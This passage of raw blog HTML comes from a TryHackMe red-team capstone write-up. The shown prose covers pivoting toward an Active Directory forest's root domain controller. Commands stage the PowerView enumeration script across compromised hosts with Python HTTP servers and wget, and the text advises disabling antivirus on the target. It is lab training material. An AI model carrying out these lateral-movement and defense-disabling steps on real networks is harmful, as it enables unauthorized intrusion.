data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194558\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?fit=1024%2C692&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1024%2C692&#038;ssl=1\" alt=\"\" class=\"wp-image-507\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1024%2C692&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=300%2C203&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=768%2C519&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?resize=1536%2C1037&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?w=1543&amp;ssl=1 1543w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now connect over RDP and submit the proofs of compromise. Our network expands further, revealing another domain on the network.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09117c5f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09117c5f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" data-attachment-id=\"508\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206175504\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?fit=1292%2C788&amp;ssl=1\" data-orig-size=\"1292,788\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206175504\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?fit=1024%2C625&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=1024%2C625&#038;ssl=1\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=1024%2C625&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?resize=768%2C468&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206175504.png?w=1292&amp;ssl=1 1292w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"31-compromising-the-rootdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising the ROOTDC<\/mark><\/h2>\n\n\n\n<p>Looking at the network topology, we can see that the AD Forest contains two child domains&#8211;CORPDC and BANKDC&#8211;and a parent DC&#8211;ROOTDC. Our shortest path to compromise the entire forest would be to compromise the ROOTDC first. This will give us access to the other machines on the network.<\/p>\n\n\n\n<p>We can begin our enumeration by finding out the domain trust relationship between CORPDC and ROOTDC. To enumerate the domains, we will use <code>PowerView<\/code>, a PowerShell module that provides commands for enumerating the domain.<\/p>\n\n\n\n<p>But first, we will need to get the PowerView script onto the CORPDC machine. 
To make the file transfer, we will perform the following steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host the <code>PowerView.ps1<\/code> file on our Kali machine<\/li>\n\n\n\n<li>Get the file onto the <code>VPN<\/code> machine<\/li>\n\n\n\n<li>Host the file using a Python web server on the <code>VPN<\/code> machine<\/li>\n\n\n\n<li>Download the file to the <code>CORPDC<\/code> machine<\/li>\n<\/ul>\n\n\n\n<p><strong>On our Kali (Attack) Machine:<\/strong><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" 
stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-m<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http.server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Serving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">port<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #BABED8\"> (http:\/\/0.0.0.0:80\/) ...<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" 
class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On VPN machine:<\/strong><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"root@ip-10-200-113-12:\/var\/www\/html# cd \/tmp\nroot@ip-10-200-113-12:\/tmp# wget http:\/\/10.50.110.229\/PowerView.ps1\n--2024-02-07 15:15:26--  http:\/\/10.50.110.229\/PowerView.ps1\nConnecting to 10.50.110.229:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 770279 (752K) [application\/octet-stream]\nSaving to: \u2018PowerView.ps1\u2019\n\nPowerView.ps1       100%[===================&gt;] 752.23K   238KB\/s    in 3.2s    \n\n2024-02-07 15:15:30 (238 KB\/s) - \u2018PowerView.ps1\u2019 saved [770279\/770279]\n\nroot@ip-10-200-113-12:\/tmp# python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/var\/www\/html#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/tmp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/tmp#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">wget<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.50.110.229\/PowerView.ps1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--2024-02-07<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:15:26--<\/span><span 
style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http:\/\/10.50.110.229\/PowerView.ps1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Connecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.50<\/span><span style=\"color: #C3E88D\">.110.229:80...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connected.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">request<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">sent,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">awaiting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">response...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Length:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">770279<\/span><span style=\"color: #BABED8\"> (752K) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">application\/octet-stream<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Saving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2018PowerView.ps1\u2019<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PowerView.ps1<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">100<\/span><span style=\"color: #C3E88D\">%[==================<\/span><span style=\"color: 
#BABED8\">=<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #C3E88D\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">752.23<\/span><span style=\"color: #C3E88D\">K<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">238<\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3.2<\/span><span style=\"color: #C3E88D\">s<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024-02-07<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:15:30<\/span><span style=\"color: #BABED8\"> (238 <\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">) - \u2018PowerView.ps1\u2019 saved <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">770279<\/span><span style=\"color: #BABED8\">\/770279<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/tmp#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-m<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http.server<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Serving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">port<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8000<\/span><span style=\"color: #BABED8\"> (http:\/\/0.0.0.0:8000\/) ...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On CORPDC:<\/strong><\/p>\n\n\n\n<p>Before trying to get the file on CORPDC, we will need to turn OFF <code>Virus Protection<\/code>, and also allow our VPN server IP to download files in the browser settings.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911856f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911856f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"629\" data-attachment-id=\"509\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200201\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?fit=1466%2C900&amp;ssl=1\" data-orig-size=\"1466,900\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200201\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?fit=1024%2C629&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" 
data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=1024%2C629&#038;ssl=1\" alt=\"\" class=\"wp-image-509\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=1024%2C629&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=300%2C184&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=768%2C471&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?w=1466&amp;ssl=1 1466w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09118ac0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09118ac0\" 
class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"627\" data-attachment-id=\"510\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200355\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?fit=1335%2C817&amp;ssl=1\" data-orig-size=\"1335,817\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200355\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?fit=1024%2C627&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=1024%2C627&#038;ssl=1\" alt=\"\" class=\"wp-image-510\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=1024%2C627&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=300%2C184&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=768%2C470&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?w=1335&amp;ssl=1 1335w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911910a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911910a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"581\" data-attachment-id=\"511\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200550\/\" 